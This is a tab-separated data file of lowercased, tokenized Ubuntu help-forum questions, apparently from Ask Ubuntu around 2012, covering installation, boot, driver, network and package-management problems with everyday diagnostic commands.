215624	alien can not built package for architecture `` ubuntu amd64 ''	i 'm using ubuntu i686 . need to install i386 .rpm packages . tried this code : alien -i [ file.i386.rpm ] tried to install ia32-libs ... apt-get install ia32-libs ... and tried alien again but did n't work . any suggestion ? thx . [ edit ] [ suggestion # 1 : run alien with sudo -c -v ... ] your suggestion did n't work . same error reported : file.i386.rpm is for architecture i386 ; the package can not be built on this system . the line above the error is the command chmod : chmod 755 [ `` name of directory '' /debian/rules ] any other suggestion ? thx .
215629	ubuntu 12.10 lenovo b570e , wifi connected but not working	i 'm running ubuntu 12.10 liveusb on a lenovo b570e . it has an atheros wifi card that connects with my home network but i ca n't browse at all . my network is multiple clients -- > router -- > isp modem -- > internet i can ping my router ( 192.168.0.1 ) but not my isp 's modem ( 192.168.15.1 ) . i have 3 other computers connected to the same router that are working fine ( infact i 'm posting from one ) ping -c 3 google.com unknown host google.com ping -c 3 8.8.8.8 shows 100 % packet loss i think its some networking issue . i tried directly connecting it to the router via ethernet cable but same issue . it gets an ip , shows lan connected but ca n't browse . if i connect it directly to the isp modem via ethernet cable it starts working fine . connection information shows : interface : 802.11 wifi ( wlan0 ) driver : ath9k security : wpa/wpa2 speed : 150mb/s ip : 192.168.0.106 broadcast : 192.168.0.255 subnet:255.255.255.0 default route : 192.168.0.1 primary dns : 192.168.15.1 i have restarted the router and modem many times . rebooted the liveusb many times .
215630	500 error on index.php file	i have found a question very similar to this , which i thought would solve my problem . however , after changing my .htaccess file , with index.php on the end of the list , and then index.php as the only entry , i still can not get index.php to display . every other page works fine , but i do n't know how to fix this . thanks .
215632	restart xfce from tty1	i am new to xubuntu , somtimes my xfce desktop crashes , and i can only use tty1 from command line . i want to know how can i restart my xfce in tty7 from tty1 ? i 've googled it , but still found the solution . tnanks .
215641	auctex in 12.04 ignores emacs 24	i just installed emacs 24 ( emacs24 24.1+1-2ubuntu3 ) in ubuntu 12.04 but it does not seem to work with auctex ( the current version is 11.86-2ubuntu2 ) . my .emacs file contains a line loading auctex , so when starting the editor for the first time i received an error it can not find auctex.el . indeed /usr/share/emacs/24.1/site-lisp does not contain any trace of auctex . i thought it could be an issue with auctex being installed before emacs 24 , so i reinstalled it . the installation log reads as follows : setting up auctex ( 11.86-2ubuntu2 ) ... install auctex for emacs install auctex for emacs23 install/auctex : setting up for emacs23 ( log file : /usr/share/emacs23/site-lisp/auctex//compilationlog ) ... done . update-auctex-elisp [ 20829 ] : further output will appear in : /var/log/auctex-emacs23.log . install auctex for emacs24 install/auctex : ignoring emacsen flavor : `` emacs24 '' . is the current version of auctex incompatible with emacs24 ? alternatively , is there a way to get around this issue ?
215648	does all programs in ubuntu are portable ?	i moved from windows to ubuntu and i 'm trying to understand if all the prgrams in ubuntu are portable ? in windows , you can use a regular program which spread it 's files all over the fs , writes to the registry and has an entry in the add/remove menu , or you can use a portable program which store all it 's data and files in one folder . so , for example , it i want to have two different versions of eclipse , that was n't a problem in windows because eclipse is a portable application , but in ubuntu i got eclipse by apt-get , and in it there is only one version i can manage . so how can i do it ?
215650	unable to boot ubuntu 12.10 after installing latest amd catalyst drivers	i started using linux about a week ago and chose ubuntu 12.10 to start out with . i ran it dual boot with windows 7 . played with it for about a week and everything was going great then i loaded up minecraft and noticed it was running poorly . so i thought i have n't done anything with my graphics yet so why not try installing new drivers . i removed my current drivers then went out and downloaded it from amd and extracted it then ran it through the terminal . everything went fine and it was successful so i rebooted . by the time it loaded back up i got to the purple screen and heard the login sound then nothing . just purple screen . i 'm using a radeon hd 6950 if that is relevant to the problem . i tried using recovery mode , my boot loader is unaffected by all this , to remove the new drivers and reinstall the old ones but quickly realized i was over my head and did n't make any changes . i know how powerful the terminal can be and i 'm still a bit hesitant to really dive into it without some direction . thanks
215653	ksoftirqd uses 100 % cpu	i am running 32bit ubuntu 10.04 . a lot of the times ksoftirqd/0 or ksoftirqd/1 start using up 100 % cpu for no apparent reason , and i am forced to reboot my laptop . incidentally this also happens when i maximize my ( youtube ) videos on chrome and fireox , but once i un-maximize the videos the cpu usage goes down to the original levels . any ideas what it going on ? -- - addendum -- - dmesg produces a ~2000 line output . i searched for 'error ' and 'warning ' in the output , and here are the relevant lines ( along with some headers ) : [ 0.000000 ] initializing cgroup subsys cpuset [ 0.000000 ] initializing cgroup subsys cpu [ 0.000000 ] linux version 2.6.32-21-generic ( buildd @ yellow ) ( gcc version 4.4.3 ( ubuntu 4.4.3-4ubuntu5 ) ) # 32-ubuntu smp fri apr 16 08:09:38 utc 2010 ( ubuntu 2.6.32-21.32-generic 2.6.32.11+drm33.2 ) [ 0.000000 ] command line : boot_image=/boot/vmlinuz-2.6.32-21-generic root=uuid=157dcfda-acd6-4d1b-a6a8-ff9ccff61906 ro quiet splash [ 0.000000 ] kernel supported cpus : [ 0.000000 ] intel genuineintel [ 0.000000 ] amd authenticamd [ 0.000000 ] centaur centaurhauls [ 0.000000 ] bios-provided physical ram map : [ 24.775546 ] ext3-fs warning : mounting fs with errors , running e2fsck is recommended [ 44920.210518 ] ata1 : serror : { phyrdychg commwake 10b8b dispar linkseq trstatrns } [ 44920.210531 ] res 40/00:00 : f0:4b:7f/00:00:18:00:00/40 emask 0x10 ( ata bus error ) [ 58673.134623 ] chrome [ 20101 ] : segfault at 7f38bc4ad000 ip 00007f38be769ecc sp 00007fff24616850 error 4 in libpepflashplayer.so [ 7f38bdc08000+e55000 ] [ 24.775546 ] ext3-fs warning : mounting fs with errors , running e2fsck is recommended [ 44920.210531 ] res 40/00:00 : f0:4b:7f/00:00:18:00:00/40 emask 0x10 ( ata bus error )
215655	mysql replication	i have 2 mysql servers , master & slave , running on ubuntu 12.04 . i have replication working from the master to the slave . if the master goes down and the slave is used , how do i get data to replicate back to the master once it 's up ?
215656	run bash script before every print job	i 'm using refilled printer cartridges that do n't show ink levels , so i made a bash script that keeps count of printed pages ( from cups log ) and shows a warning when it reaches about 200 pages ( known limit for the cartridge ) . is there a way to run this script every time cups does a print job ?
215661	boot manager is showing \ubuntu\winboot\wubildr.mbr is missing or contains error	i have installed ubuntu 12.10 version using windows installer option along with windows 8 . after selecting ubuntu during boot option , boot manager is showing the below error message . `` the os could n't be loaded because the file \ubuntu\winboot\wubildr.mbr is missing or contains error '' kindly help me to fix this issue .
215663	ubiquity installer reboots on selecting `` install alongside windows ''	i currently run windows 7 32 bit . i downloaded ubuntu 12.10 iso from http : //www.ubuntu.com/ then i burned it to a dvd . i tried to install it and everything goes fine until i reach the option install ubuntu alongside windows 7 then on clicking continue the dvd ejects itself and `` please remove the installation source from the tray '' appears on the screen , and again windows starts and the installation remains incomplete . i then created a bootable usb and tried to install but again on the same option installation stops . i 'm not an advanced user so the `` try something else option '' looks too complicated . i tried to use it but i dont know how to use this option . how can i install ubuntu ? is it that windows 7 is not allowing me to install ubuntu or is the problem something else ?
215666	do i need to make a separate partition when installing via wubi ?	i am using wubi . do i need to make a separate partition for ubuntu ? the last time i tried this , it made a folder called root on my drive and i could not access any files on that drive within ubuntu .
215669	hardware 3d acceleration suddenly stopped working	i turned on my laptop the other day and noticed that gnome was not using fancy graphics mode . as far as i know there is no reason my drivers should have stopped working , as i have n't made any upgrades or changes to the system . i 'm using ubuntu 12.04 lts . i 've upgraded it some time ago so it has nothing to do with the upgrade . the only odd behaviour i can think of is that i played eufloria and after i exited it , it failed to restore my previous resolution . i have already tried following the advice found here and here but with no results . moreover , at some step during these processes i get the following warnings : cryptsetup : warning : failed to detect canonical device of /dev/sda1 cryptsetup : warning : could not determine root device from /etc/fstab cryptsetup : warning : failed to detect canonical device of /dev/sda5
215670	are there plans to port ubuntu to the nexus 10 ?	i really want ubuntu on a tablet , but the nexus 7 is just to small for my tastes . i feel as though the nexus 10 would be a much better fit . should i just get the nexus 7 or should i expect a nexus 10 compatible installer in the near future ?
215677	weird sound while watching videos	yesterday i installed ubuntu 12.10 . while playing videos i am getting weird audio for 5-10 seconds , but thereafter it works fine . however if i forward or backward the video again that weird sound starts . i installed 12.04 some months back . there also i was getting that same sound but after some days that problem was gone . i do n't know how to do it . can you please guide me for this ? thanks in advance : )
215685	trying to copy an ext4 partition that has errors on it , to a new disk	i have a linux installation in a 50gb partition , on an old 80gb sata disk that is starting to show some errors in it 's smart status , and also , it 's an old slow disk . so i want to copy it to a newer sata disk with a spare 500gb partition on it . i tried to do it using gparted using copy/paste . gparted starts to copy it but fails with a read error after about 9 gb . checking the filesystem on the source partition shows no errors , but i see 3 sectors in the smart `` current pending sector count '' ( using ubuntu 's disk utility ) and i am thinking they are the problem ? is there a way to force it to remap these sectors to eliminate the errors ? is there a way to tell gparted it continue , rather than stop , when it finds a read error ? should i try a different tool ?
215694	changing language settings for zimbabwe	zimbabwe has now moved to a multi-currency system , and the zimbabwe dollar is no more . generally , prices throughout the country are now quoted in usd , so could you point me to the right people to remove the `` z '' from in front of the dollar sign for english/zimbabwe regional settings ? i do realize that this is not specifically an ubuntu issue , but i do n't know who to contact to inform them that the regional settings for zimbabwe are outdated . could someone please point me in the right direction , please ?
215698	ubuntu 12.10 live cd crash	im trying to install ubuntu 12.10 in my new system : i7-3770k @ 4.2ghz | noctua nh-d14 | evga 680 gtx oc |evga 460gtx | asrock z77 extreme4 | 8gb g.skill ares ddr3 2133 | agility 3 128 gb ssd | raid0 wd aaks 1tb | seagate barracuda 7.2 2tb | corsair ax850 | cm storm trooper im trying to run a live cd from an usb , used dd , ubuntu creator and unetbootin with same results . it boots the graphical enviroment but after a while it crashes . i havent had any majore issues in the past installing ubuntu on my other machines , but this one i have no idea how to fix it , any help would be appreciated . ¿could it be something related to my graphics cards setup ? pd : im running windows 7 atm , with no problems at all and ran lot of benchmarks so it isnt `` hardware problems '' .
215703	installing 12.04 server as a software raid 1 mirror fails to boot	i 'm installing a few new ubuntu server 12.04 lts servers , and they have two 512 gb ssds . i want them to use software raid 1 mirroring , so i was following this document religiously step by step : https : //help.ubuntu.com/12.04/serverguide/advanced-installation.html to summarize the above official documentation : to set up a software raid 1 mirror in ubuntu server , you choose manual partitioning during the setup , and do this on each drive : '' swap '' partition of roughly ram size '' physical volume for raid '' partition for remaining drive size after that , you set up the raid 1 mirror using the raid partitions on drive a and b , make it ext4 and containing the root filesystem partition . setup continues from there just fine . one caveat : i was completely unable to select the `` physical volume for raid '' as bootable . when i tried to do that in setup , it had no effect : i could press enter on the `` make bootable '' option all day long and nothing would ever change . however , after install successfully completes , i have a big problem : the system wo n't boot ! i get reboot and select proper boot device or insert boot media in selected boot device and press a key what did i do wrong ? why ca n't i mark that `` physical volume for raid '' partition bootable during ubuntu server setup ? is there some way for me to make the physical volumes for raid bootable after the fact , perhaps from a live cd or something ?
215705	terminal running with superuser	how can activate the terminal to be run as superuser . i do n't see the icon nor know the command line to do so
215708	how to remove ubuntu 12.10 and install 10.04 ?	i have a pc with windows 7 and ubuntu 12.10 dual boot . i want to remove ubuntu 12.10 and i want to install ubuntu 10.04lts because my micromax wireless 3g modem is not supported in ubuntu 12.10 . can you please tell me how can i do that ?
215710	changing python default in 12.04 lts	i have downloaded and installed python 3.2.3 for ubuntu/debian . also idle ide for 3.2.3 . if i execute idle for 3.2.3 explicitely , 3.2.3 runs under idle and all is well . but if i go to a terminal session and simple run python , it defaults to python 2.7.3 . also my python commercial ide ( wingware ) defaults to python 2.7.3 . how can i change my global python default to be 3.2.3 instead of 2.7.3 ?
215712	software center can not install or remove software	i have ubuntu 12.10 and when i try to install a new software using the software center , it fails with the following error message : authentication error software can not be installed or removed because the authentication service is not available . ( org.freedesktop.policykit.error.failed : ( `` system-bus-name '' , { name:1.475 } ) .org.debian.apt.install-or-remove-packages this is a new problem that i did not have before ! any suggestions ?
215717	how do i get a broadcom bcm430n wireless card working ?	my acer computer with ubuntu12.10 ca n't connect the wifi . how can i do with this . i see the question at wireless does n't work on a broadcom bcm4312 , the first answer said i can use b43-fwcutter and firmware-b43-lpphy-installer , but there is n't a download link at https : //apps.ubuntu.com/cat/applications/b43-fwcutter/ , neither nor firmware-b43-lpphy-installer , who has it.how can i do .
215723	need help fixing dpkg errors after update from 12.04 to 12.10	so i was doing fine then i upgraded my system to 12.10 and now i cant get my system to update all of its packages properly . no matter what i do , what is happening here and how do i fix this . if i would have thought 12.10 would be this much of a hassle i would have never upgraded ... .. here is a sampling of the code that returns from `` apt-get -f install '' it should also be noted that it is just these 6 packages only . no other packages have given me this kind of trouble . well i should say as of now . it was just 5 , but them i got an update for unity , and now unity-common is added to the trouble makers . which prevents me from further upgrading the actual unity package as this package is a dependancy . preparing to replace usb-modeswitch-data 20120120-0ubuntu1 ( using ... /usb-modeswitch-data_20120815-1_all.deb ) ... /var/lib/dpkg/info/usb-modeswitch-data.prerm : 4 : /var/lib/dpkg/info/usb-modeswitch-data.prerm : dpkg-maintscript-helper : input/output error dpkg : warning : subprocess old pre-removal script returned error exit status 2 dpkg : trying script from the new package instead ... /var/lib/dpkg/tmp.ci/prerm : 4 : /var/lib/dpkg/tmp.ci/prerm : dpkg-maintscript-helper : input/output error dpkg : error processing /var/cache/apt/archives/usb-modeswitch-data_20120815-1_all.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 2 /var/lib/dpkg/info/usb-modeswitch-data.postinst : 7 : /var/lib/dpkg/info/usb-modeswitch-data.postinst : dpkg-maintscript-helper : input/output error dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : /var/cache/apt/archives/network-manager_0.9.6.0-0ubuntu7_i386.deb /var/cache/apt/archives/pcmciautils_018-8_i386.deb /var/cache/apt/archives/unity-common_6.10.0-0ubuntu2_all.deb /var/cache/apt/archives/whoopsie_0.2.7_i386.deb /var/cache/apt/archives/usb-modeswitch_1.2.3+repack0-1ubuntu3_i386.deb /var/cache/apt/archives/usb-modeswitch-data_20120815-1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i would also like to note i have cleaned apt cashe both through the terminal and manualy , i have tried installing them manually through dpkg from both the /var/cache/apt/archives/ location and from my own manually downloaded .deb files . i have tried using dpkg-reconfigure and i have used bleachbit to clean my system . i have also tested both my hdd and memory and found no significant errors to lead to the input/output errors . quite frankly i am just out of options and have grown tired of trying to google a solution to this mess but still do not wish to pursue backing up settings and reinstalling the system . any help would be appreciated . i am only interested in answers , please leave your feeling towards grammar , punctuation , and bias towards how a `` post should look '' at the door . if you dont have something to contribute towards solving my problem then you are just doing nothing but contributing to it . thank you .
215734	creating .pdf from terminal	it it possible that to make pdf of any webpage using any command in terminal
215736	ubuntu 12.04lts - dash home application question mark icon	i have installed phpstorm application in my ubuntu 12.04 but in the dash home ( and in dash bar also ) appears a question mark icon . i have tried to re-config the shorcut , but it not works ( just the icon , the app open when i click it ) . here is my *.desktop : [ desktop entry ] version=1.0 type=application name=jetbrains phpstorm genericname=jetbrains phpstorm x-gnome-fullname=php storm php ide exec= '' /opt/phpstorm/bin/phpstorm.sh '' % f tryexec= '' /opt/phpstorm/bin/phpstorm.sh '' % f icon= '' /opt/phpstorm/bin/phpstorm.png '' categories=development ; ide ; terminal=false startupnotify=true startupwmclass=jetbrains-phpstorm in /opt/ ... ./phpstorm.png i have my 128x128px icon . how to show fine my icon ? ? i also have tried to use xpm icon or the default phpstorm icon , but it does not works
215737	another mysql daemon is already running ?	root @ jose-desktop : ~ # sudo /opt/lampp/lampp start starting xampp for linux 1.7.7 ... xampp : starting apache ... xampp : another mysql daemon is already running . xampp : starting proftpd ... xampp for linux started . i managed to connect the apache but , now , , , another mysql daemon is already running ? still appearing and i ca n't connect mysql any help ?
215738	how to run script when locking screen and end it when user type in password ?	what i am trying to do is to run a script while screen is locked . can somebody guide me through it ?
215747	how to connect to internet via wired usb adsl modem in ubuntu liveusb edition ?	i have alcatel thomson speedtouch 330 usb model modem.i can ubuntu desktop 64 liveusb flawlessly but i do n't know how to set up my internet connection ? i tried network manager and entered my isp , username and password but it did n't work . can somebody help me ?
215748	how to rebuild a package for a different ubuntu release	i 've got an app packaged for ubuntu 12.04 , which lives on a ppa . from that same package and sources tarball , i 'd like to generate a package for ubuntu 12.10 . i thought i 'd just add an entry to debian/changelog with the same version and a different release and that would do the trick : qreator ( 12.05.6 ) quantal ; urgency=low * quantal upload -- $ email_hidden qreator ( 12.05.6 ) precise ; urgency=low * lots of awesome changes -- $ email_hidden however , when building the package , i get a lintian warning that tells me latest-debian-changelog-entry-without-new-version which is probably a hint that i 'm doing something wrong . so what 's the best way to simply rebuild an existing package for a different release ( to be uploaded in a ppa ) ? or alternatively , can i do this automatically from launchpad ( e.g . an option to build the same package on an existing ppa for a different release ) ?
215754	system identifies the dongle but does n't let me connect to the internet	i downloaded a tar.gz file of the dongle 's driver but i do n't know how to install it . i 'm kind of new to linux systems . can someone help me please ? using the terminal i tried going to the folder where i extracted the files from the tar.gz file and then i typed ./install but then again there was a permission error . so i typed chmod a+x install . that fixed the permission error but then they say no such file or directory . can someone please help me fix this ?
215755	install 12.10 to an external usb hard drive automatically mounted at /cdrom	how can i install ubuntu 12.10 to an external usb hdd ? on the disc partitioning screen of the installer there is only /dev/sda showing up in the list . however in a terminal window i can see /dev/sdb with sudo fdisk -l. so how can i get ubiquiti to show /dev/sdb as well ?
215758	how to install showcase 5	just trying to install showcase 5 for ubuntu . i believe it is a adobe air package but i ca n't find it . thanks for the help
215759	problem with booting ubuntu 12.04lts 64bit	i 've tryed ubuntu with livecd and i liked it ; that 's why i 've finally decided to change windows 7 with ubuntu . i 've installed the 12.04 lts distro , and i have a problem . i 've burned the image downloaded on the official site to a cd , and installed it on my notebook , and it seems to work fine . at the end i viewed the restart window , and i restarted my pc and always appears a blank purple screen and waiting for 10 , 20 minutes nothing changes . it works only by entering on restore mode ... have you got any idea to fix this problem ? ps : i 've searched for solutions on the net , but nothing seems to change . this is my pc : acer aspire 5560 amd dual core a4-3300m with turbo core amd radeon hd 6480g 512mb 4 gb ddr3 ram
215760	installing drivers for an ati hd4670	i just installed ubuntu 12.10 on my pc and now i 'm trying to install the necessary drivers for my video card . i tried downloading the drivers from the ati radeon official site but the installer gives me the following error : package build failed ! package build utility output : ./packages/ubuntu/ati-packager.sh : 294 : ./packages/ubuntu/ati-packager.sh : debclean : not found ./packages/ubuntu/ati-packager.sh : 295 : ./packages/ubuntu/ati-packager.sh : dpkg-buildpackage : not found [ error ] generate package - error generating package : ubuntu/quantal after i reboot the the side-bar , the top-bar and the menu bar for opened windows disappear . the only way i can get everything to revert back to normal is to uninstall the drivers . is there any way to get ati drivers to work on ubuntu ?
215764	where are the application crash files stored ?	i experience instability with my ubuntu 12.04 64-bit . i receive messages sorry , ubuntu 12.04 has experiences an internal error . if you notice further problems , try restarting the computer the messages show up a few times per day but they not associated with the same application . today i have one with /usr/share/screenlets/screenlets-pack-basic/sysmonitor/sysmonitorscreenlet.py and another one is /usr/bin/vlc . i would like to solve the problem , but at first i want to save the details of each warning to track underlying problem . i can not find any way to save details of this warning and can not find , if they are saved somewhere on the system as a log . i can not highlight few lines at ones , and if i try to copy a line , it does not work . is there a way to save the details of these errors ?
215786	how do i create a .deb file ?	yes , i know that this question has been asked many times before , but none of the answers really helped . i 'd like to package the minecraft launcher ( which has no proprietary code , afaik , ) into a .deb file so that i can put it on a flash drive and share it with my friends . i have managed to install minecraft it manually ( put some files into /opt/minecraft , download an icon , and create a .desktop file in /usr/share/applications , ) and i have made a shell script that completely automates the process , but it relies on wget to retrieve a few files , including the .desktop file . ( it is n't a self-extracting archive , after all . ) i 'd like to be able to do this offline , as a lot of my friends have slow or no internet . ( one of their internet lines was buried so shallowly that it actually got knocked out by the lawnmower . ) i wo n't be loading it into a ppa or anything like that ; i just want it to be a `` formal '' package that can be easily installed and uninstalled . ( one thing that i would like is for sudo apt-get purge minecraft to also remove the .minecraft folder . it would also be nice to define the dependedcies as being able to accept openjdk or sun 's jvm . ) oh , just so you know , the minecraft launcher is a .jar file , but i can very , very easily launch it via shell scripts . the exact command is right on the download page .
215787	unable to boot to partition in 12.10	i installed ubuntu 12.10 on asus a55a alongside prexisting windows 7 no boot option for ubuntu . laptop boots directly to windows every time and can not see or use ubuntu partition .
215792	loaded 12.10 wireless connects but does not load internet	loaded 12.10 wireless connects but does not load internet , but it does load after restarting the computer . it is just frustrating to have start the computer twice to go online . i 'm using a lenovo think pad .
215799	what is this 'x ' command ( with paramters ) that uses 24 % cpu ?	this is using about 24 % of my cpu 's resources . /usr/bin/x :0 -auth /var/run/light/dm/root/:0 -novtswitch -background non note : the `` oh 's '' could be `` zero 's '' as almost no programs including task manager list the traditional computer zero as 0 which is different from a narrow o - depending upon the font . i am running clamtk in a scan , but with terror bite drives , it 's taking hours as in 24 hours , the system is slowing right down , maybe due to lack of free space on the ssd , but ? so what does it all mean ? or more exactly what does the statement mean , in relation to it 's component parts - being lightdm and the tcp association ?
215803	how do i install mini wirieless lan adapter , usb.802.11n 150mbps	i have a mini wireless lan adapter , usb.80211n 150mbps with a driverdisk and in the manual there are instructions that say they support linux , but i do n't know how to install it . the output is confic not found 518674.020063 atal.00 : exeption emask 0x0 sact 0x0 serr 0x0 action 0x6 frozen and so on . i do n't know how to use the terminal .
215805	ubuntu 12.10 wont boot	im new to using ubuntu and just bought a hp pavilion g6-2240sa with windows 8 pre installed . i made a bootable usb with ubuntu on it and installed alsongside windows , for 2 days it worked fine , i got into ubuntu by doing an advanced restart from windows 8 and then booting ubuntu from the partition it made . when i did the advanced restart today there was only 1 hdd i could select ( there were 3 before windows , a restore partition that was already there when i got the computer and ubuntu ) so i booted from the usb again and re-installed ubuntu . then did an advanced restart and the 3 partitions where there again , i booted from ubuntu and now heres my problem . i get the ubuntu background when its loading then its just a black screen with some writing , its not on long enough to read , then just a black screen with a white _ and the top left corner that does nothing , i have to restat the computer and it auto boots into windows 8. im a little confused as the first time i installed ubuntu it worked fine until the partition dissaperd ) , the second time i installed i did everything the same except it found the old ubuntu so i reinstalled it and now is donst work .
215807	déjà dup over ssh - where to enter my login credentials ?	i 'm trying to make a backup of my folder in my ubuntu 12.10 . i 'm using backup in system setting using ssh , it can go through preparation file to backup . but then failed . can not have permission to write i can ssh my site with terminal , but in this backup , i dont know where to type my userid and pass just like in ssh .
215810	out of memory on matlab	i 'm trying to run a script on matlab_2011a , which calculate same means for a climatology of 50 years . when i started to run the script for all the years it worked fine until the iteration 20th , and then appeared the message : out of memory . type help memory for your options . then i used clear v1 v2 v3 ... to clear all the variables inside the function , also i used clear train because i saw it in another forum , and these with the modifications or not , i run again the script ( since the 21th iteration ) , and the result is the same message , but curiously sometimes it run a year and then stop . any ideas about solving this problem ? , what i have to clean to run correctly ? ( in this matlab version there 's not the command memory which maybe could help me ) . edit solution : there was a variable that was too large , saving the results differently prevented the out of memory error .
215812	freezes when finishing installation of ubuntu 12.10	i wanted to install ubuntu next to my windows 7 and made a 100gb partition for that . after that i downloaded the image for burning the installation cd . as soon as i started to boot from that dvd , my computer made some crackling noises and then froze completely . i had to press the power button in order to shut it down . after that i decided to download the installer version for windows and startet installing it on the e : \ partition named ubuntu . so far so good , the installer finished and told me to restart my computer . i did that and ubuntu wanted to finish the installation . as soon as that started , the computer made some crackling noises again and froze completely . then i tried the safe graphics option , or whatever it is called , and it froze again . i would really like to have ubuntu installed on my system , because i like it . my computer components are the following : mainboard : gigabyte x58-usb3 processor : intel core i7 960 ram : 8gb 2000mhz graphicscard : nvidia geforce gtx 570 hdd : 1 tb 7200rpm with 3 partitions ( 100gb w7 , 100gb ubuntu , 800gb data )
215814	how to xkill an application by its id ?	i need to simulate the behavior of the keyboard shortcut ( alt+f4 ) using terminal for a given application . if i open for example gedit and click alt + f4 , then gedit will be xkilled . if i want to achieve same thing using terminal , how should i proceed ? the following command ( in order to kill gedit process ) works fine : kill $ eval `pidof gedit` yet , the command xkill -id gedit prompts me to click on the application client window in order to xkill it , thing that i want to avoid from the beginning . the reason why i want to achieve this behavior is that some applications clients keep their process running , even though you alt+f4 it . my need is that i have an application that starts up on every login and i need to automatically close its client 3 or 5 seconds after it shows up .
215815	system does n't show option to select operating system during startup !	i am new at linux and ubuntu , today i installed ubuntu 12.04 but during installation some problem happened , i do n't remember what was that exactly ( but can tell you that it was related to boot ) , so i reinstalled ubuntu ( using usb stick both time ) and ubuntu installation finished successfully , now problem is that when i start my computer then system is directly selecting ubuntu as my operating system , i have installed it along with windows 7 in option during installation , so it should give me option to select which operating system i want to use . i do n't know what may be the problem . also , i want to know where ubuntu is installed ( which directory ) ? i just selected default setting during installation as i am noob in these things . /** i think i found problem , problem is that during startup the selection of operating system is hidden behind this square box saying that 'out of range 92.5khz / 58hz ' , i was able to guess windows 7 option will be last so using my sense i can choose operating system now . but now again new problem that message ( i think there is some screen resolution problem so desktop is unable to display window saying that out of range ) , i have no idea how to solve this problem now . ) */ -- -- solution -- -- -- -- grub . i download grub customizer and change the resolution of the screen and now i can see all the menu !
215819	high cpu load during i/o	i 'm using ubuntu server 12.04 lts on a amd e-350 based machine . during i/o heavy loads ( for example transferring files via nfs or http , extracting archives , making backups etc . ) the cpu load goes completly insane . i saw load averages well above eight on this two core machine ... and the responsiveness is much lower . i think the issues are definitely on the kernel side of things , but see for yourself : $ sudo hdparm -i /dev/sdb /dev/sdb : ata device , with non-removable media model number : samsung hd501lj firmware revision : cr100-10 transport : serial , ata8-ast , sata 1.0a , sata ii extensions , sata rev 2.5 standards : used : ata-8-acs revision 3b supported : 8 7 6 5 configuration : logical max current cylinders 16383 16383 heads 16 16 sectors/track 63 63 -- chs current addressable sectors : 16514064 lba user addressable sectors : 268435455 lba48 user addressable sectors : 976771055 logical/physical sector size : 512 bytes device size with m = 1024*1024 : 476938 mbytes device size with m = 1000*1000 : 500106 mbytes ( 500 gb ) cache/buffer size = 16384 kbytes ( type=dualportcache ) capabilities : lba , iordy ( can be disabled ) queue depth : 32 standby timer values : spec 'd by standard , no device specific minimum r/w multiple sector transfer : max = 16 current = 16 recommended acoustic management value : 254 , current value : 128 dma : mdma0 mdma1 mdma2 udma0 udma1 udma2 udma3 udma4 udma5 *udma6 udma7 cycle time : min=120ns recommended=120ns pio : pio0 pio1 pio2 pio3 pio4 cycle time : no flow control=120ns iordy flow control=120ns commands/features : enabled supported : * smart feature set security mode feature set * power management feature set * write cache * look-ahead * host protected area feature set * write_buffer command * read_buffer command * nop cmd * download_microcode set_max security extension * automatic acoustic management feature set * 48-bit address feature set * device configuration overlay feature set * mandatory flush_cache * flush_cache_ext * smart error logging * smart self-test * general purpose logging feature set * 64-bit world wide name * segmented download_microcode * gen1 signaling speed ( 1.5gb/s ) * gen2 signaling speed ( 3.0gb/s ) * native command queueing ( ncq ) * host-initiated interface power management * phy event counters * dma setup auto-activate optimization device-initiated interface power management * software settings preservation * smart command transport ( sct ) feature set * sct long sector access ( ac1 ) * sct lba segment access ( ac2 ) * sct error recovery control ( ac3 ) * sct features control ( ac4 ) * sct data tables ( ac5 ) security : master password revision code = 65534 supported not enabled not locked frozen not expired : security count supported : enhanced erase 168min for security erase unit . 168min for enhanced security erase unit . logical unit wwn device identifier : 50000f001b301090 naa : 5 ieee oui : 0000f0 unique id : 01b301090 checksum : correct $ iostat 1 # one slice below device : tps kb_read/s kb_wrtn/s kb_read kb_wrtn sda 0.00 0.00 0.00 0 0 sdb 355.00 60544.00 0.00 60544 0 $ vmstat 1 procs -- -- -- -- -- -memory -- -- -- -- -- -- -swap -- -- -- -io -- -- -system -- -- -- cpu -- -- r b swpd free buff cache si so bi bo in cs us sy id wa 1 9 0 152864 12 3302740 0 0 61952 0 18115 1999 1 24 12 63 0 8 0 153316 12 3302060 0 0 59648 0 20060 2393 1 33 9 57 0 10 0 153432 12 3302060 0 0 54784 0 18430 2205 1 24 11 65 1 8 0 154848 12 3301216 0 0 59392 0 19011 2291 1 31 8 60 0 9 0 149676 12 3306324 0 0 59392 0 21149 2417 2 29 6 64 0 9 0 150460 12 3305268 0 0 61952 0 18664 2117 1 28 11 60 1 8 0 152084 12 3304028 0 0 59392 0 20045 2245 2 31 6 62 1 8 0 152548 12 3303452 0 0 60160 0 20105 2426 2 29 9 60 anything i could do about that ?
215822	12.10 weird graphical artifacts	installed 12.10 everything went well , until after i login . i get weird graphical artifacts and ca n't do anything . the plus side is that i still have windows 7 running well . i am extremely new to ubuntu so if you could give me a hand that would be great .
215829	how to change the guest session keyboard layout ?	i use the dvorak keyboard layout . when i switch to a guest session it defaults to the dvorak layout as well . unfortunately this only produces gibberish for most people typing . is there a way to set the default guest session keyboard layout ?
215831	why limit the number of open files and running processes in linux ?	i do not have much knowledge about operating system internal workings , so why do we have limits for maximum number of open files and running processes in linux ? i would appreciate it if anyone could help me understand .
215837	12.10 nvidia geforce gt650m support ?	is ubuntu 12.10 giving nvidia gt650m support ? i have installed the nvidia-current drivers and adjusted the /etc/x11/xorg.conf . the computer starts and i could sign in . but the unity desktop was unusable because the dash and launcher are not shown .
215842	ubuntu 12.10 : sometimes a black screen after boot	sometimes i get a black screen after i boot my computer , i can hear the login sound from the login manager but the screen is black . i have a n-vidia gt650m ( without the n-video drivers ) .
215843	can i use ubuntu sso with network.http.sendrefererheader set to 0 ?	i have just discovered that setting network.http.sendrefererheader to 0 in firefox 's about : config causes ubuntu-sso to stop working , meaning i can not log into any ubuntu-sso sites like launchpad or ask ubuntu . is there any way to use ubuntu sso without sending out https referers to every site i visit ?
215847	is n't there an installer package for oracle database ?	i wish i could install oracle database as easy as possible using ubuntu software center or apt-get install . i suggest that at least , someone of the community , could create a package that installs it dirclty from their website or from a pre-downloaded files by the user their selves . just like : googleearth-package '' utility to automatically build a debian package of google earth ''
